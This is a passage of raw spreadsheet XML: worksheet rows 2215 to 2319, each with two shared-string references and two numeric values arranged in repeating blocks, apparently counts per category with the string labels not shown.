    <row r="2215" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2215" t="s">
        <v>16223</v>
      </c>
      <c r="B2215" t="s">
        <v>16223</v>
      </c>
      <c r="C2215">
        <v>350</v>
      </c>
      <c r="D2215">
        <v>655</v>
      </c>
    </row>
    <row r="2216" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2216" t="s">
        <v>16224</v>
      </c>
      <c r="B2216" t="s">
        <v>16224</v>
      </c>
      <c r="C2216">
        <v>0</v>
      </c>
      <c r="D2216">
        <v>655</v>
      </c>
    </row>
    <row r="2217" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2217" t="s">
        <v>16228</v>
      </c>
      <c r="B2217" t="s">
        <v>16211</v>
      </c>
      <c r="C2217">
        <v>0</v>
      </c>
      <c r="D2217">
        <v>1190</v>
      </c>
    </row>
    <row r="2218" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2218" t="s">
        <v>16231</v>
      </c>
      <c r="B2218" t="s">
        <v>16212</v>
      </c>
      <c r="C2218">
        <v>0</v>
      </c>
      <c r="D2218">
        <v>1190</v>
      </c>
    </row>
    <row r="2219" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2219" t="s">
        <v>16228</v>
      </c>
      <c r="B2219" t="s">
        <v>16213</v>
      </c>
      <c r="C2219">
        <v>0</v>
      </c>
      <c r="D2219">
        <v>1190</v>
      </c>
    </row>
    <row r="2220" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2220" t="s">
        <v>16231</v>
      </c>
      <c r="B2220" t="s">
        <v>16214</v>
      </c>
      <c r="C2220">
        <v>0</v>
      </c>
      <c r="D2220">
        <v>1190</v>
      </c>
    </row>
    <row r="2221" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2221" t="s">
        <v>16228</v>
      </c>
      <c r="B2221" t="s">
        <v>16215</v>
      </c>
      <c r="C2221">
        <v>0</v>
      </c>
      <c r="D2221">
        <v>1190</v>
      </c>
    </row>
    <row r="2222" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2222" t="s">
        <v>16231</v>
      </c>
      <c r="B2222" t="s">
        <v>16216</v>
      </c>
      <c r="C2222">
        <v>1</v>
      </c>
      <c r="D2222">
        <v>1190</v>
      </c>
    </row>
    <row r="2223" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2223" t="s">
        <v>16228</v>
      </c>
      <c r="B2223" t="s">
        <v>16217</v>
      </c>
      <c r="C2223">
        <v>1</v>
      </c>
      <c r="D2223">
        <v>1190</v>
      </c>
    </row>
    <row r="2224" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2224" t="s">
        <v>16231</v>
      </c>
      <c r="B2224" t="s">
        <v>16218</v>
      </c>
      <c r="C2224">
        <v>3</v>
      </c>
      <c r="D2224">
        <v>1190</v>
      </c>
    </row>
    <row r="2225" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2225" t="s">
        <v>16229</v>
      </c>
      <c r="B2225" t="s">
        <v>16219</v>
      </c>
      <c r="C2225">
        <v>0</v>
      </c>
      <c r="D2225">
        <v>1190</v>
      </c>
    </row>
    <row r="2226" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2226" t="s">
        <v>16230</v>
      </c>
      <c r="B2226" t="s">
        <v>16220</v>
      </c>
      <c r="C2226">
        <v>0</v>
      </c>
      <c r="D2226">
        <v>1190</v>
      </c>
    </row>
    <row r="2227" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2227" t="s">
        <v>16229</v>
      </c>
      <c r="B2227" t="s">
        <v>16221</v>
      </c>
      <c r="C2227">
        <v>2</v>
      </c>
      <c r="D2227">
        <v>1190</v>
      </c>
    </row>
    <row r="2228" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2228" t="s">
        <v>16230</v>
      </c>
      <c r="B2228" t="s">
        <v>16222</v>
      </c>
      <c r="C2228">
        <v>3</v>
      </c>
      <c r="D2228">
        <v>1190</v>
      </c>
    </row>
    <row r="2229" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2229" t="s">
        <v>16223</v>
      </c>
      <c r="B2229" t="s">
        <v>16223</v>
      </c>
      <c r="C2229">
        <v>26</v>
      </c>
      <c r="D2229">
        <v>1190</v>
      </c>
    </row>
    <row r="2230" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2230" t="s">
        <v>16224</v>
      </c>
      <c r="B2230" t="s">
        <v>16224</v>
      </c>
      <c r="C2230">
        <v>0</v>
      </c>
      <c r="D2230">
        <v>1190</v>
      </c>
    </row>
    <row r="2231" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2231" t="s">
        <v>16228</v>
      </c>
      <c r="B2231" t="s">
        <v>16211</v>
      </c>
      <c r="C2231">
        <v>0</v>
      </c>
      <c r="D2231">
        <v>408</v>
      </c>
    </row>
    <row r="2232" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2232" t="s">
        <v>16231</v>
      </c>
      <c r="B2232" t="s">
        <v>16212</v>
      </c>
      <c r="C2232">
        <v>0</v>
      </c>
      <c r="D2232">
        <v>408</v>
      </c>
    </row>
    <row r="2233" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2233" t="s">
        <v>16228</v>
      </c>
      <c r="B2233" t="s">
        <v>16213</v>
      </c>
      <c r="C2233">
        <v>0</v>
      </c>
      <c r="D2233">
        <v>408</v>
      </c>
    </row>
    <row r="2234" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2234" t="s">
        <v>16231</v>
      </c>
      <c r="B2234" t="s">
        <v>16214</v>
      </c>
      <c r="C2234">
        <v>0</v>
      </c>
      <c r="D2234">
        <v>408</v>
      </c>
    </row>
    <row r="2235" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2235" t="s">
        <v>16228</v>
      </c>
      <c r="B2235" t="s">
        <v>16215</v>
      </c>
      <c r="C2235">
        <v>2</v>
      </c>
      <c r="D2235">
        <v>408</v>
      </c>
    </row>
    <row r="2236" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2236" t="s">
        <v>16231</v>
      </c>
      <c r="B2236" t="s">
        <v>16216</v>
      </c>
      <c r="C2236">
        <v>0</v>
      </c>
      <c r="D2236">
        <v>408</v>
      </c>
    </row>
    <row r="2237" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2237" t="s">
        <v>16228</v>
      </c>
      <c r="B2237" t="s">
        <v>16217</v>
      </c>
      <c r="C2237">
        <v>6</v>
      </c>
      <c r="D2237">
        <v>408</v>
      </c>
    </row>
    <row r="2238" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2238" t="s">
        <v>16231</v>
      </c>
      <c r="B2238" t="s">
        <v>16218</v>
      </c>
      <c r="C2238">
        <v>20</v>
      </c>
      <c r="D2238">
        <v>408</v>
      </c>
    </row>
    <row r="2239" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2239" t="s">
        <v>16229</v>
      </c>
      <c r="B2239" t="s">
        <v>16219</v>
      </c>
      <c r="C2239">
        <v>0</v>
      </c>
      <c r="D2239">
        <v>408</v>
      </c>
    </row>
    <row r="2240" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2240" t="s">
        <v>16230</v>
      </c>
      <c r="B2240" t="s">
        <v>16220</v>
      </c>
      <c r="C2240">
        <v>0</v>
      </c>
      <c r="D2240">
        <v>408</v>
      </c>
    </row>
    <row r="2241" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2241" t="s">
        <v>16229</v>
      </c>
      <c r="B2241" t="s">
        <v>16221</v>
      </c>
      <c r="C2241">
        <v>0</v>
      </c>
      <c r="D2241">
        <v>408</v>
      </c>
    </row>
    <row r="2242" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2242" t="s">
        <v>16230</v>
      </c>
      <c r="B2242" t="s">
        <v>16222</v>
      </c>
      <c r="C2242">
        <v>0</v>
      </c>
      <c r="D2242">
        <v>408</v>
      </c>
    </row>
    <row r="2243" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2243" t="s">
        <v>16223</v>
      </c>
      <c r="B2243" t="s">
        <v>16223</v>
      </c>
      <c r="C2243">
        <v>21</v>
      </c>
      <c r="D2243">
        <v>408</v>
      </c>
    </row>
    <row r="2244" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2244" t="s">
        <v>16224</v>
      </c>
      <c r="B2244" t="s">
        <v>16224</v>
      </c>
      <c r="C2244">
        <v>1</v>
      </c>
      <c r="D2244">
        <v>408</v>
      </c>
    </row>
    <row r="2245" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2245" t="s">
        <v>16228</v>
      </c>
      <c r="B2245" t="s">
        <v>16211</v>
      </c>
      <c r="C2245">
        <v>0</v>
      </c>
      <c r="D2245">
        <v>806</v>
      </c>
    </row>
    <row r="2246" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2246" t="s">
        <v>16231</v>
      </c>
      <c r="B2246" t="s">
        <v>16212</v>
      </c>
      <c r="C2246">
        <v>0</v>
      </c>
      <c r="D2246">
        <v>806</v>
      </c>
    </row>
    <row r="2247" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2247" t="s">
        <v>16228</v>
      </c>
      <c r="B2247" t="s">
        <v>16213</v>
      </c>
      <c r="C2247">
        <v>0</v>
      </c>
      <c r="D2247">
        <v>806</v>
      </c>
    </row>
    <row r="2248" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2248" t="s">
        <v>16231</v>
      </c>
      <c r="B2248" t="s">
        <v>16214</v>
      </c>
      <c r="C2248">
        <v>0</v>
      </c>
      <c r="D2248">
        <v>806</v>
      </c>
    </row>
    <row r="2249" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2249" t="s">
        <v>16228</v>
      </c>
      <c r="B2249" t="s">
        <v>16215</v>
      </c>
      <c r="C2249">
        <v>0</v>
      </c>
      <c r="D2249">
        <v>806</v>
      </c>
    </row>
    <row r="2250" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2250" t="s">
        <v>16231</v>
      </c>
      <c r="B2250" t="s">
        <v>16216</v>
      </c>
      <c r="C2250">
        <v>1</v>
      </c>
      <c r="D2250">
        <v>806</v>
      </c>
    </row>
    <row r="2251" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2251" t="s">
        <v>16228</v>
      </c>
      <c r="B2251" t="s">
        <v>16217</v>
      </c>
      <c r="C2251">
        <v>2</v>
      </c>
      <c r="D2251">
        <v>806</v>
      </c>
    </row>
    <row r="2252" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2252" t="s">
        <v>16231</v>
      </c>
      <c r="B2252" t="s">
        <v>16218</v>
      </c>
      <c r="C2252">
        <v>7</v>
      </c>
      <c r="D2252">
        <v>806</v>
      </c>
    </row>
    <row r="2253" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2253" t="s">
        <v>16229</v>
      </c>
      <c r="B2253" t="s">
        <v>16219</v>
      </c>
      <c r="C2253">
        <v>0</v>
      </c>
      <c r="D2253">
        <v>806</v>
      </c>
    </row>
    <row r="2254" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2254" t="s">
        <v>16230</v>
      </c>
      <c r="B2254" t="s">
        <v>16220</v>
      </c>
      <c r="C2254">
        <v>0</v>
      </c>
      <c r="D2254">
        <v>806</v>
      </c>
    </row>
    <row r="2255" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2255" t="s">
        <v>16229</v>
      </c>
      <c r="B2255" t="s">
        <v>16221</v>
      </c>
      <c r="C2255">
        <v>0</v>
      </c>
      <c r="D2255">
        <v>806</v>
      </c>
    </row>
    <row r="2256" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2256" t="s">
        <v>16230</v>
      </c>
      <c r="B2256" t="s">
        <v>16222</v>
      </c>
      <c r="C2256">
        <v>0</v>
      </c>
      <c r="D2256">
        <v>806</v>
      </c>
    </row>
    <row r="2257" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2257" t="s">
        <v>16223</v>
      </c>
      <c r="B2257" t="s">
        <v>16223</v>
      </c>
      <c r="C2257">
        <v>24</v>
      </c>
      <c r="D2257">
        <v>806</v>
      </c>
    </row>
    <row r="2258" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2258" t="s">
        <v>16224</v>
      </c>
      <c r="B2258" t="s">
        <v>16224</v>
      </c>
      <c r="C2258">
        <v>0</v>
      </c>
      <c r="D2258">
        <v>806</v>
      </c>
    </row>
    <row r="2259" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2259" t="s">
        <v>16228</v>
      </c>
      <c r="B2259" t="s">
        <v>16211</v>
      </c>
      <c r="C2259">
        <v>0</v>
      </c>
      <c r="D2259">
        <v>825</v>
      </c>
    </row>
    <row r="2260" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2260" t="s">
        <v>16231</v>
      </c>
      <c r="B2260" t="s">
        <v>16212</v>
      </c>
      <c r="C2260">
        <v>0</v>
      </c>
      <c r="D2260">
        <v>825</v>
      </c>
    </row>
    <row r="2261" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2261" t="s">
        <v>16228</v>
      </c>
      <c r="B2261" t="s">
        <v>16213</v>
      </c>
      <c r="C2261">
        <v>0</v>
      </c>
      <c r="D2261">
        <v>825</v>
      </c>
    </row>
    <row r="2262" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2262" t="s">
        <v>16231</v>
      </c>
      <c r="B2262" t="s">
        <v>16214</v>
      </c>
      <c r="C2262">
        <v>0</v>
      </c>
      <c r="D2262">
        <v>825</v>
      </c>
    </row>
    <row r="2263" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2263" t="s">
        <v>16228</v>
      </c>
      <c r="B2263" t="s">
        <v>16215</v>
      </c>
      <c r="C2263">
        <v>14</v>
      </c>
      <c r="D2263">
        <v>825</v>
      </c>
    </row>
    <row r="2264" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2264" t="s">
        <v>16231</v>
      </c>
      <c r="B2264" t="s">
        <v>16216</v>
      </c>
      <c r="C2264">
        <v>9</v>
      </c>
      <c r="D2264">
        <v>825</v>
      </c>
    </row>
    <row r="2265" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2265" t="s">
        <v>16228</v>
      </c>
      <c r="B2265" t="s">
        <v>16217</v>
      </c>
      <c r="C2265">
        <v>0</v>
      </c>
      <c r="D2265">
        <v>825</v>
      </c>
    </row>
    <row r="2266" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2266" t="s">
        <v>16231</v>
      </c>
      <c r="B2266" t="s">
        <v>16218</v>
      </c>
      <c r="C2266">
        <v>0</v>
      </c>
      <c r="D2266">
        <v>825</v>
      </c>
    </row>
    <row r="2267" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2267" t="s">
        <v>16229</v>
      </c>
      <c r="B2267" t="s">
        <v>16219</v>
      </c>
      <c r="C2267">
        <v>0</v>
      </c>
      <c r="D2267">
        <v>825</v>
      </c>
    </row>
    <row r="2268" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2268" t="s">
        <v>16230</v>
      </c>
      <c r="B2268" t="s">
        <v>16220</v>
      </c>
      <c r="C2268">
        <v>0</v>
      </c>
      <c r="D2268">
        <v>825</v>
      </c>
    </row>
    <row r="2269" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2269" t="s">
        <v>16229</v>
      </c>
      <c r="B2269" t="s">
        <v>16221</v>
      </c>
      <c r="C2269">
        <v>142</v>
      </c>
      <c r="D2269">
        <v>825</v>
      </c>
    </row>
    <row r="2270" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2270" t="s">
        <v>16230</v>
      </c>
      <c r="B2270" t="s">
        <v>16222</v>
      </c>
      <c r="C2270">
        <v>644</v>
      </c>
      <c r="D2270">
        <v>825</v>
      </c>
    </row>
    <row r="2271" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2271" t="s">
        <v>16223</v>
      </c>
      <c r="B2271" t="s">
        <v>16223</v>
      </c>
      <c r="C2271">
        <v>26</v>
      </c>
      <c r="D2271">
        <v>825</v>
      </c>
    </row>
    <row r="2272" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2272" t="s">
        <v>16224</v>
      </c>
      <c r="B2272" t="s">
        <v>16224</v>
      </c>
      <c r="C2272">
        <v>1</v>
      </c>
      <c r="D2272">
        <v>825</v>
      </c>
    </row>
    <row r="2273" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2273" t="s">
        <v>16228</v>
      </c>
      <c r="B2273" t="s">
        <v>16211</v>
      </c>
      <c r="C2273">
        <v>0</v>
      </c>
      <c r="D2273">
        <v>1405</v>
      </c>
    </row>
    <row r="2274" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2274" t="s">
        <v>16231</v>
      </c>
      <c r="B2274" t="s">
        <v>16212</v>
      </c>
      <c r="C2274">
        <v>0</v>
      </c>
      <c r="D2274">
        <v>1405</v>
      </c>
    </row>
    <row r="2275" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2275" t="s">
        <v>16228</v>
      </c>
      <c r="B2275" t="s">
        <v>16213</v>
      </c>
      <c r="C2275">
        <v>0</v>
      </c>
      <c r="D2275">
        <v>1405</v>
      </c>
    </row>
    <row r="2276" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2276" t="s">
        <v>16231</v>
      </c>
      <c r="B2276" t="s">
        <v>16214</v>
      </c>
      <c r="C2276">
        <v>0</v>
      </c>
      <c r="D2276">
        <v>1405</v>
      </c>
    </row>
    <row r="2277" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2277" t="s">
        <v>16228</v>
      </c>
      <c r="B2277" t="s">
        <v>16215</v>
      </c>
      <c r="C2277">
        <v>0</v>
      </c>
      <c r="D2277">
        <v>1405</v>
      </c>
    </row>
    <row r="2278" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2278" t="s">
        <v>16231</v>
      </c>
      <c r="B2278" t="s">
        <v>16216</v>
      </c>
      <c r="C2278">
        <v>5</v>
      </c>
      <c r="D2278">
        <v>1405</v>
      </c>
    </row>
    <row r="2279" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2279" t="s">
        <v>16228</v>
      </c>
      <c r="B2279" t="s">
        <v>16217</v>
      </c>
      <c r="C2279">
        <v>0</v>
      </c>
      <c r="D2279">
        <v>1405</v>
      </c>
    </row>
    <row r="2280" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2280" t="s">
        <v>16231</v>
      </c>
      <c r="B2280" t="s">
        <v>16218</v>
      </c>
      <c r="C2280">
        <v>0</v>
      </c>
      <c r="D2280">
        <v>1405</v>
      </c>
    </row>
    <row r="2281" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2281" t="s">
        <v>16229</v>
      </c>
      <c r="B2281" t="s">
        <v>16219</v>
      </c>
      <c r="C2281">
        <v>0</v>
      </c>
      <c r="D2281">
        <v>1405</v>
      </c>
    </row>
    <row r="2282" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2282" t="s">
        <v>16230</v>
      </c>
      <c r="B2282" t="s">
        <v>16220</v>
      </c>
      <c r="C2282">
        <v>0</v>
      </c>
      <c r="D2282">
        <v>1405</v>
      </c>
    </row>
    <row r="2283" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2283" t="s">
        <v>16229</v>
      </c>
      <c r="B2283" t="s">
        <v>16221</v>
      </c>
      <c r="C2283">
        <v>10</v>
      </c>
      <c r="D2283">
        <v>1405</v>
      </c>
    </row>
    <row r="2284" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2284" t="s">
        <v>16230</v>
      </c>
      <c r="B2284" t="s">
        <v>16222</v>
      </c>
      <c r="C2284">
        <v>40</v>
      </c>
      <c r="D2284">
        <v>1405</v>
      </c>
    </row>
    <row r="2285" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2285" t="s">
        <v>16223</v>
      </c>
      <c r="B2285" t="s">
        <v>16223</v>
      </c>
      <c r="C2285">
        <v>25</v>
      </c>
      <c r="D2285">
        <v>1405</v>
      </c>
    </row>
    <row r="2286" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2286" t="s">
        <v>16224</v>
      </c>
      <c r="B2286" t="s">
        <v>16224</v>
      </c>
      <c r="C2286">
        <v>0</v>
      </c>
      <c r="D2286">
        <v>1405</v>
      </c>
    </row>
    <row r="2287" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2287" t="s">
        <v>16231</v>
      </c>
      <c r="B2287" t="s">
        <v>16212</v>
      </c>
      <c r="C2287">
        <v>6</v>
      </c>
      <c r="D2287">
        <v>1304</v>
      </c>
    </row>
    <row r="2288" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2288" t="s">
        <v>16228</v>
      </c>
      <c r="B2288" t="s">
        <v>16213</v>
      </c>
      <c r="C2288">
        <v>36</v>
      </c>
      <c r="D2288">
        <v>1304</v>
      </c>
    </row>
    <row r="2289" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2289" t="s">
        <v>16231</v>
      </c>
      <c r="B2289" t="s">
        <v>16214</v>
      </c>
      <c r="C2289">
        <v>0</v>
      </c>
      <c r="D2289">
        <v>1304</v>
      </c>
    </row>
    <row r="2290" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2290" t="s">
        <v>16231</v>
      </c>
      <c r="B2290" t="s">
        <v>16216</v>
      </c>
      <c r="C2290">
        <v>6</v>
      </c>
      <c r="D2290">
        <v>1304</v>
      </c>
    </row>
    <row r="2291" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2291" t="s">
        <v>16228</v>
      </c>
      <c r="B2291" t="s">
        <v>16217</v>
      </c>
      <c r="C2291">
        <v>36</v>
      </c>
      <c r="D2291">
        <v>1304</v>
      </c>
    </row>
    <row r="2292" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2292" t="s">
        <v>16231</v>
      </c>
      <c r="B2292" t="s">
        <v>16218</v>
      </c>
      <c r="C2292">
        <v>0</v>
      </c>
      <c r="D2292">
        <v>1304</v>
      </c>
    </row>
    <row r="2293" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2293" t="s">
        <v>16231</v>
      </c>
      <c r="B2293" t="s">
        <v>16214</v>
      </c>
      <c r="C2293">
        <v>6</v>
      </c>
      <c r="D2293">
        <v>1304</v>
      </c>
    </row>
    <row r="2294" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2294" t="s">
        <v>16231</v>
      </c>
      <c r="B2294" t="s">
        <v>16218</v>
      </c>
      <c r="C2294">
        <v>6</v>
      </c>
      <c r="D2294">
        <v>1304</v>
      </c>
    </row>
    <row r="2295" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2295" t="s">
        <v>16228</v>
      </c>
      <c r="B2295" t="s">
        <v>16211</v>
      </c>
      <c r="C2295">
        <v>0</v>
      </c>
      <c r="D2295">
        <v>1846</v>
      </c>
    </row>
    <row r="2296" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2296" t="s">
        <v>16231</v>
      </c>
      <c r="B2296" t="s">
        <v>16212</v>
      </c>
      <c r="C2296">
        <v>0</v>
      </c>
      <c r="D2296">
        <v>1846</v>
      </c>
    </row>
    <row r="2297" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2297" t="s">
        <v>16228</v>
      </c>
      <c r="B2297" t="s">
        <v>16213</v>
      </c>
      <c r="C2297">
        <v>0</v>
      </c>
      <c r="D2297">
        <v>1846</v>
      </c>
    </row>
    <row r="2298" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2298" t="s">
        <v>16231</v>
      </c>
      <c r="B2298" t="s">
        <v>16214</v>
      </c>
      <c r="C2298">
        <v>0</v>
      </c>
      <c r="D2298">
        <v>1846</v>
      </c>
    </row>
    <row r="2299" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2299" t="s">
        <v>16228</v>
      </c>
      <c r="B2299" t="s">
        <v>16215</v>
      </c>
      <c r="C2299">
        <v>7</v>
      </c>
      <c r="D2299">
        <v>1846</v>
      </c>
    </row>
    <row r="2300" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2300" t="s">
        <v>16231</v>
      </c>
      <c r="B2300" t="s">
        <v>16216</v>
      </c>
      <c r="C2300">
        <v>4</v>
      </c>
      <c r="D2300">
        <v>1846</v>
      </c>
    </row>
    <row r="2301" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2301" t="s">
        <v>16228</v>
      </c>
      <c r="B2301" t="s">
        <v>16217</v>
      </c>
      <c r="C2301">
        <v>6</v>
      </c>
      <c r="D2301">
        <v>1846</v>
      </c>
    </row>
    <row r="2302" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2302" t="s">
        <v>16231</v>
      </c>
      <c r="B2302" t="s">
        <v>16218</v>
      </c>
      <c r="C2302">
        <v>6</v>
      </c>
      <c r="D2302">
        <v>1846</v>
      </c>
    </row>
    <row r="2303" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2303" t="s">
        <v>16229</v>
      </c>
      <c r="B2303" t="s">
        <v>16219</v>
      </c>
      <c r="C2303">
        <v>0</v>
      </c>
      <c r="D2303">
        <v>1846</v>
      </c>
    </row>
    <row r="2304" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2304" t="s">
        <v>16230</v>
      </c>
      <c r="B2304" t="s">
        <v>16220</v>
      </c>
      <c r="C2304">
        <v>0</v>
      </c>
      <c r="D2304">
        <v>1846</v>
      </c>
    </row>
    <row r="2305" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2305" t="s">
        <v>16229</v>
      </c>
      <c r="B2305" t="s">
        <v>16221</v>
      </c>
      <c r="C2305">
        <v>0</v>
      </c>
      <c r="D2305">
        <v>1846</v>
      </c>
    </row>
    <row r="2306" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2306" t="s">
        <v>16230</v>
      </c>
      <c r="B2306" t="s">
        <v>16222</v>
      </c>
      <c r="C2306">
        <v>0</v>
      </c>
      <c r="D2306">
        <v>1846</v>
      </c>
    </row>
    <row r="2307" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2307" t="s">
        <v>16223</v>
      </c>
      <c r="B2307" t="s">
        <v>16223</v>
      </c>
      <c r="C2307">
        <v>26</v>
      </c>
      <c r="D2307">
        <v>1846</v>
      </c>
    </row>
    <row r="2308" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2308" t="s">
        <v>16224</v>
      </c>
      <c r="B2308" t="s">
        <v>16224</v>
      </c>
      <c r="C2308">
        <v>2</v>
      </c>
      <c r="D2308">
        <v>1846</v>
      </c>
    </row>
    <row r="2309" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2309" t="s">
        <v>16228</v>
      </c>
      <c r="B2309" t="s">
        <v>16211</v>
      </c>
      <c r="C2309">
        <v>0</v>
      </c>
      <c r="D2309">
        <v>2577</v>
      </c>
    </row>
    <row r="2310" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2310" t="s">
        <v>16231</v>
      </c>
      <c r="B2310" t="s">
        <v>16212</v>
      </c>
      <c r="C2310">
        <v>0</v>
      </c>
      <c r="D2310">
        <v>2577</v>
      </c>
    </row>
    <row r="2311" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2311" t="s">
        <v>16228</v>
      </c>
      <c r="B2311" t="s">
        <v>16213</v>
      </c>
      <c r="C2311">
        <v>0</v>
      </c>
      <c r="D2311">
        <v>2577</v>
      </c>
    </row>
    <row r="2312" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2312" t="s">
        <v>16231</v>
      </c>
      <c r="B2312" t="s">
        <v>16214</v>
      </c>
      <c r="C2312">
        <v>0</v>
      </c>
      <c r="D2312">
        <v>2577</v>
      </c>
    </row>
    <row r="2313" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2313" t="s">
        <v>16228</v>
      </c>
      <c r="B2313" t="s">
        <v>16215</v>
      </c>
      <c r="C2313">
        <v>5</v>
      </c>
      <c r="D2313">
        <v>2577</v>
      </c>
    </row>
    <row r="2314" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2314" t="s">
        <v>16231</v>
      </c>
      <c r="B2314" t="s">
        <v>16216</v>
      </c>
      <c r="C2314">
        <v>8</v>
      </c>
      <c r="D2314">
        <v>2577</v>
      </c>
    </row>
    <row r="2315" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2315" t="s">
        <v>16228</v>
      </c>
      <c r="B2315" t="s">
        <v>16217</v>
      </c>
      <c r="C2315">
        <v>5</v>
      </c>
      <c r="D2315">
        <v>2577</v>
      </c>
    </row>
    <row r="2316" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2316" t="s">
        <v>16231</v>
      </c>
      <c r="B2316" t="s">
        <v>16218</v>
      </c>
      <c r="C2316">
        <v>3</v>
      </c>
      <c r="D2316">
        <v>2577</v>
      </c>
    </row>
    <row r="2317" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2317" t="s">
        <v>16229</v>
      </c>
      <c r="B2317" t="s">
        <v>16219</v>
      </c>
      <c r="C2317">
        <v>0</v>
      </c>
      <c r="D2317">
        <v>2577</v>
      </c>
    </row>
    <row r="2318" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2318" t="s">
        <v>16230</v>
      </c>
      <c r="B2318" t="s">
        <v>16220</v>
      </c>
      <c r="C2318">
        <v>0</v>
      </c>
      <c r="D2318">
        <v>2577</v>
      </c>
    </row>
    <row r="2319" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2319" t="s">
        <v>16229</v>
      </c>
      <c r="B2319" t="s">
        <v>16221</v>
      </c>
      <c r="C2319">
        <v>18</v>
      </c>
      <c r="D2319">
        <v>2577</v>
      </c>
    </row>
